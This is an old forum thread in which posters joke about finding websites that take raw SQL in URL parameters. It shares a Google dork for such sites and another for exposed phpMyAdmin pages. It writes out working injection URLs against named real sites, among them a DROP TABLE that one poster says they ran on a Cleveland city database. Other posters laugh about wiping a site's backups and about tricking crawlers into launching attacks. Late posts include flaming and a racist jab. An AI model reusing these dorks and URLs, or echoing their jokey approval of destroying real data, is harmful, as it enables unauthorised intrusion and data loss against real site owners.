SQL injection madness
-
The following Google query returns some fantastic results (thousands of them):
inurl:select inurl:where inurl:%20
-
Wow! I hope Bobby Tables doesn't visit any of those websites.
-
Bah! I've entirely failed to drop any tables at all.
Not that I tried, of course.
I [i]especially[/i] didn't try on the United Nations homepage.
-
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]User does not have permission to perform this operation on table 'Restaurantes'.
/Gastronomia/RestaurantesI.asp, line 204
I think the problem is that all the sites vulnerable enough to be fun have already been entirely destroyed by the many and varied evils of the internet.
-
Shit shit shit, though I hate to admit it, I dropped a table on the city of cleveland's website.
<font size="3">http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=SELECT+Ward%2C+PPN%2C+Street_Number%2C+Street_Name%2C+Frontage_of_Parcel%2C+Depth_of_Parcel%2C+Sqfeet++++%0D%0AFROM+cityport%0D%0AWHERE+Buildescr+%3D+'Non-Buildable'+and+Ward+in+(12%2C+13%2C+14%2C+15%2C+16%2C+17%2C+18%2C+19%2C+20%2C+21)&sql_order=+order+by+'Ward'+ASC&pos=120 turned into</font>
<font size="3">http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=DROP TABLE cityport</font>
Am I going to jail now? Maybe I can find a google cache of the database and manually restore it.
WHO USES sql_querys in the URL and FURTHERMORE who the hell gives that user FULL DATABASE ACCESS, why not just read on certain tables.
The sad AND scary thing is that most of the results I get from that google search are for GOVERNMENT websites. Who the hell are they contracting to do their web work?
-
You've got to be kidding me.
Stumbled onto this gem too..
http://cd.city.cleveland.oh.us/scripts/LandbankReports.05232007
-
You know, I thought you must be joking or something at first, until I went to that site myself and did a search on all records, and it didn't turn up anything. Wow.
Way to go, random Cleveland site. You have the worst security I've seen in my life, and have just paid for it. Do a better job next time.
-
@Bladezor said:
The sad AND scary thing is that most of the results I get from that google search are for GOVERNMENT websites. Who the hell are they contracting to do their web work?
The lowest bidder. Enough said.
-
Ok, I did what I could to "restore" their database.
Recreate the table:
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&sql_query=CREATE TABLE landbank.cityport (Ward TEXT NOT NULL, PPN TEXT NOT NULL ,Street_Number TEXT NOT NULL, Street_Name TEXT NOT NULL, Frontage_of_Parcel TEXT NOT NULL, Depth_of_Parcel TEXT NOT NULL, Sqfeet TEXT NOT NULL, Buildescr TEXT NOT NULL)
Populate it:
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("18","00515009","3091","W%20106TH%20ST","25","105","2625","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("19","01919053","0","WANDA%20AVE","40","112","4480","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("19","01917012","0","BELLAIRE%20RD","64","65","4160","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("19","01917011","0","BELLAIRE%20RD","40","99","3960","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("19","01916150","0","LEEILA%20AVE","40","111","4440","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("19","01916149","0","LEEILA%20AVE","40","111","4440","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("19","01826053","0","BROOKLAWN%20AVE","297","73","21681","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("19","01826052","0","BROOKLAWN%20AVE","71","52","3692","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02225081","0","VICTORY%20BLVD","61","89","5429","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02225080","0","VICTORY%20BLVD","62","110","6820","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02225079","0","VICTORY%20BLVD","68","119","8092","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02225034","0","W%20140%20ST","21","232","4872","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02225078","0","VICTORY%20BLVD","60","113","6780","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02010091","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009088","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009087","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009086","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009085","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009084","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009083","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009082","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009081","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009080","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")
http://cd.city.cleveland.oh.us/scripts/sql.php?db=landbank&table=cityport&sql_query=INSERT INTO landbank.cityport VALUES("20","02009079","0","MILLIGAN%20AVE","35","109","3815","Non-Buildable")Good enough..?
-
Ugh, one of you guys dropped the table again..I'm not fixing it again..
-
http://www.websahara.de/query.php?query=select+[snip]+from+land%2C+bild+where+[snip]&start=20&showrow=5
You can abuse this to show more records, but when you try to DROP the table with
http://www.websahara.de/query.php?query=DROP+TABLE+land+%2c+bild&start=0&showrow=5
you will get:
-
@bobday said:
http://www.websahara.de/query.php?query=select+[snip]+from+land%2C+bild+where+[snip]&start=20&showrow=5
You can abuse this to show more records, but when you try to DROP the table with
http://www.websahara.de/query.php?query=DROP+TABLE+land+%2c+bild&start=0&showrow=5
you will get:
It's just searching for some substrings like delete or drop, but it appears security is enforced properly:
http://www.websahara.de/query.php?query=truncate%20table+land
It didn't catch the query, but you get an
Access denied for user: 'websahara@localhost' to database 'websahara'
-
I just noticed this page in the search results:
http://www.sleep-in.ch/suchergebnis_gast.php?zoneid=10&katid=&minpers=&lang=d&Anfangsposition=40&abfrage=SELECT+i_id%2Ci_name%2Ci_vorname%2Ccb.bez+as+cod_bez%2Csubstring(value%2C1%2C20)+as+l_value%2Ci_max_personen%2Ci_zeitraum_von%2Ci_zeitraum_bis%2C+zb.bezeichnung+as+z_bez%2Ci_bemerkung%2CUNIX_TIMESTAMP(i_mutiert_am)+as+mutdat%0D%0A+++++++++++++FROM+inserate%2C+codes+co%2C+codebez+cb%2C+countries+c%2C+zonen+z%2C+zonenbez+zb%0D%0A++++++++++++where+i_rubrik_cod_id+%3D+100%0D%0A++++++++++++++and+i_typ_cod_id+%3D+200%0D%0A++++++++++++++and+i_status_cod_id+%3D+900%0D%0A++++++++++++++and+i_kat_cod_id+%3D+co.cod_id%0D%0A++++++++++++++and+co.cod_id+%3D+cb.cod_id%0D%0A++++++++++++++and+cb.spr_id+%3D+'d'+%0D%0A++++++++++++++and+i_land+%3D+c.id+%0D%0A++++++++++++++and+i_z_id+%3D+z.z_id%0D%0A++++++++++++++and+z.z_id+%3D+zb.z_id%0D%0A++++++++++++++and+zb.spr_id+%3D+'d'+and+i_z_id+in+('3'%2C'11'%2C'12'%2C'13')+order+by+cod_bez%2C+UNIX_TIMESTAMP(i_mutiert_am)+desc+&PHPSESSID=3b40f967208e224666840320c4a51273
and now I remember having read about that site in the local newspapers a few days ago. They were reported to have lost records last friday, and the operators restored to the last backup. Shall I help them test their backup/restore procedure once again? :-)
-
BTW, this is what they report under "Aktuell" == "news":
In der Nacht vom Sonntag, 20. April auf Montag 21. April 2008 wurde sleep-in.ch Opfer eines Hacker-Angriffs.
Dabei wurden alle Angebote der über 2800 Gastgeber und Gäste gezielt gelöscht. Sleep-In konnte mit wenigen Ausnahmen alle Inserate wiederherstellen (Stand Sonntag Morgen). Sleep-In entschuldigt sich bei seinen Gastgeber und Gästen und arbeitet mit Hochdruck daran, dass sich dieser Vorfall nicht wiederholen kann.
Aber natürlich sind wir verärgert und enttäuscht.
Trotzdem: Auf eine gfreute Euro08!Translates to
During the night sunday, april 20 to monday april 21, sleep-in.ch has become the victim of a hacker attack.
Now, what do we say!Thereby, all offers of more than 2800 hosts and guests have been deleted on purpose. Sleep-in was able to restore all ads with only a few exception (status of sunday morning). Sleep-In is apologizing to all hosts and guests and is working with high pressure to not let this incident repeat itself.
But of course, we are angry and disappointed.
Still: Enjoy a happy Euro08!
-
@TheRider said:
BTW, this is what they report under "Aktuell" == "news":
During the night sunday, april 20 to monday april 21, sleep-in.ch has become the victim of a hacker attack.
Now, what do we say!Thereby, all offers of more than 2800 hosts and guests have been deleted on purpose. Sleep-in was able to restore all ads with only a few exception (status of sunday morning). Sleep-In is apologizing to all hosts and guests and is working with high pressure to not let this incident repeat itself.
But of course, we are angry and disappointed.
Still: Enjoy a happy Euro08!
They only do nightly backups, people should delete their records in the evening
-
" aah!! h4xx0rs!! "
-
-
@Bladezor said:
Ugh, one of you guys dropped the table again..I'm not fixing it again..
I get the feeling that by the end of the day their database is going to be in a sad state of affairs.
-
@galgorah said:
@Bladezor said:
Ugh, one of you guys dropped the table again..I'm not fixing it again..
I get the feeling that by the end of the day their database is going to be in a sad state of affairs.Bonus points if someone succeeds in executing rm -rf /var/backup :)
-
@t-bone said:
Bonus
pointsprison rape if someone succeeds in executing rm -rf /var/backup :)FTFY.
-
@belgariontheking said:
Sig: To fill your mind with knowledge, we must start by emptying it
That's really funny, considering the context of this thread.
-
Looks like they took it offline, or someone dropped the database(s)
-
@Xiphonex said:
I guess I should have added earlier to my above post "Or it may not exist at all!"Looks like they took it offline, or someone dropped the database(s)
-
@Bladezor said:
Shit shit shit, though I hate to admit it, I dropped a table on the city of cleveland's website.
@Bladezor said:
Ok, I did what I could to "restore" their database.
@Bladezor said:
Ugh, one of you guys dropped the table again..I'm not fixing it again..
That is the funniest thing I have reaad in ages. I thank you.
mt
-
@mtill said:
That is the funniest thing I have reaad in ages. I thank you.
I agree! Never before have I seen someone use SQL injection to actually RESTORE someone's database. The only thing better would be if they truly hacked this server and, instead of just destroying it, went ahead and patched all the security holes, defragmented the hard drive and emptied the trash.
-
@Outlaw Programmer said:
...and emptied the trash.
But critical documents were stored there!
-
@TheRider said:
http://www.sleep-in.ch/suchergebnis_gast.php?zoneid=10&katid=&minpers=&lang=d&Anfangsposition=40&abfrage=SELECT+i_id%2Ci_name%2Ci_vorname%2Ccb.bez+as+cod_bez%2Csubstring(value%2C1%2C20)+as+l_value%2Ci_max_personen%2Ci_zeitraum_von%2Ci_zeitraum_bis%2C+zb.bezeichnung+as+z_bez%2Ci_bemerkung%2CUNIX_TIMESTAMP(i_mutiert_am)+as+mutdat%0D%0A+++++++++++++FROM+inserate%2C+codes+co%2C+codebez+cb%2C+countries+c%2C+zonen+z%2C+zonenbez+zb%0D%0A++++++++++++where+i_rubrik_cod_id+%3D+100%0D%0A++++++++++++++and+i_typ_cod_id+%3D+200%0D%0A++++++++++++++and+i_status_cod_id+%3D+900%0D%0A++++++++++++++and+i_kat_cod_id+%3D+co.cod_id%0D%0A++++++++++++++and+co.cod_id+%3D+cb.cod_id%0D%0A++++++++++++++and+cb.spr_id+%3D+'d'+%0D%0A++++++++++++++and+i_land+%3D+c.id+%0D%0A++++++++++++++and+i_z_id+%3D+z.z_id%0D%0A++++++++++++++and+z.z_id+%3D+zb.z_id%0D%0A++++++++++++++and+zb.spr_id+%3D+'d'+and+i_z_id+in+('3'%2C'11'%2C'12'%2C'13')+order+by+cod_bez%2C+UNIX_TIMESTAMP(i_mutiert_am)+desc+&PHPSESSID=3b40f967208e224666840320c4a51273
The Real WTF is that that's correctly indented. Oh, and \r\n newlines.
-
Man, like 4 in a row seem to be fakes or something. You can put anything in the query string and it still returns the same result. Also, a few phpMyAdmin pages here.
@Carnildo said:@Outlaw Programmer said:
I lol'd....and emptied the trash.
But critical documents were stored there!
-
Nice going guys... but they are onto you!
http://www.computerworld.com/action/article.do?command=printArticleBasic&articleId=9080678
-
@MasterPlanSoftware said:
Nice going guys... but they are onto you!
http://www.computerworld.com/action/article.do?command=printArticleBasic&articleId=9080678
Wow, I wouldn't want to be the guy who tried an SQL injection attack on the UN right about now...
thinks...
Oh shit.
-
@rc_pinchey said:
Wow, I wouldn't want to be the guy who tried an SQL injection attack on the UN right about now...
*thinks...*
Oh shit.Meh, the UN has no real power. "In latest news, the UN security council has voted to send a firmly-worded letter to rc_pinchey for attempting to hack its database."
-
SQL Injection is too much work.
I prefer the ease and convenience of:
http://www.google.com/search?q="at+end+of+table"+"next+autoindex"
-
@superjer said:
Wow. Just Wow.SQL Injection is too much work.
I prefer the ease and convenience of:
http://www.google.com/search?q="at+end+of+table"+"next+autoindex"
-
@superjer said:
SQL Injection is too much work.
I prefer the ease and convenience of:
http://www.google.com/search?q="at+end+of+table"+"next+autoindex"I clicked on the very first Google result and -- there's a tab labelled "Drop".. That couldn't possibly do what I think it does -- could it?? I clicked on it, but just couldn't bring myself to click on "OK". All I can say is . . . . OH MY GOD!!!!
[img]http://www.zweg.com/dump/photo/holyshit.png[/img]
-
@Tuuli Mustasydan said:
I clicked on the very first Google result and -- there's a tab labelled "Drop".. That couldn't possibly do what I think it does -- could it?? I clicked on it, but just couldn't bring myself to click on "OK". All I can say is . . . . OH MY GOD!!!!
You're lying. I can't see any phpmyadmin database there!
-
Hypothetically, you could create crafty URL:s, put them on the web somewhere, and let the Google spider do the "real" hacking. Hypothetically.
-
@Outlaw Programmer said:
@mtill said:
That is the funniest thing I have reaad in ages. I thank you.
I agree! Never before have I seen someone use SQL injection to actually RESTORE someone's database. The only thing better would be if they truly hacked this server and, instead of just destroying it, went ahead and patched all the security holes, defragmented the hard drive and emptied the trash.
Bah. Then They'd only expect us to fix all their problems from now on ...
-
Update: See also The Spider of Doom, if you forgot that story.
-
@MasterPlanSoftware said:
Nice going guys... but they are onto you!
http://www.computerworld.com/action/article.do?command=printArticleBasic&articleId=9080678
The guestbook I attacked isn't back yet... I feel somewhat bad...
At least it didn't belong to the UN.
-
@Bladezor said:
Ugh, one of you guys dropped the table again..I'm not fixing it again..
Actually, GoogleBot probably dropped the table for you. Just include the restore query in this thread too, and GoogleBot should get stuck in an infinite loop of destroying and recreating that table until the end of time.
-
@Kyanar said:
@Bladezor said:
Ugh, one of you guys dropped the table again..I'm not fixing it again..
Actually, GoogleBot probably dropped the table for you. Just include the restore query in this thread too, and GoogleBot should get stuck in an infinite loop of destroying and recreating that table until the end of time.
I don't think GoogleBot would add a table called "ThisIsFun" and a
database called "Fubar" right before the whole thing was dropped.
-
I love how Microsoft's response is basically "it's not a bug in the software, but update anyway" and "it's an SQL injection exploit" without any attempt to explain what an SQL injection exploit is. People read "exploit", they assume the software (i.e. IIS) is responsible. The more tables drop, the more flak Microsoft takes for something that (for once) actually isn't their problem! Ha!
-
-
@MasterPlanSoftware said:
@lolwtf said:
Even more daily drivel
Thanks for pointing out the obvious!
Has too much exposure to Swampy turned you into a troll? That seems a little uncalled-for...
-
@rc_pinchey said:
That seems a little uncalled-for...
Then go read our daily dose of 'lolwtf'. He has decided to post on every thread with nonsense.
Brilliant posts like "Really'.
So no, not uncalled for.
-
Flaming is always uncalled for.
-
@fbjon said:
Flaming is always uncalled for.
I happen to live in a state that allows homosexuals to marry one another? Do you find that offensive, too? You're no better than the people who wouldn't allow blacks to vote. Well, except that blacks probably won't vote the right way..
-
@morbiuswilters said:
@fbjon said:
Flaming is always uncalled for.
I happen to live in a state that allows homosexuals to marry one another? Do you find that offensive, too? You're no better than the people who wouldn't allow blacks to vote.
Yeah really, we don't need your kind around here. Take your hate and fear mongering elsewhere please.
-
@rc_pinchey said:
@MasterPlanSoftware said:
You're only noticing now that he's a troll?@lolwtf said:
Even more daily drivel
Thanks for pointing out the obvious!
Has too much exposure to Swampy turned you into a troll? That seems a little uncalled-for...
-
@lolwtf said:
You're only noticing now that he's a troll?
More like an annoying hyperactive child. Just look at his post count. Close to mine, but he wrote almost all of them during the last 6 months. A good troll doesn't post that much. He drops a carefully crafted flamebait now and then and enjoys the fallout.
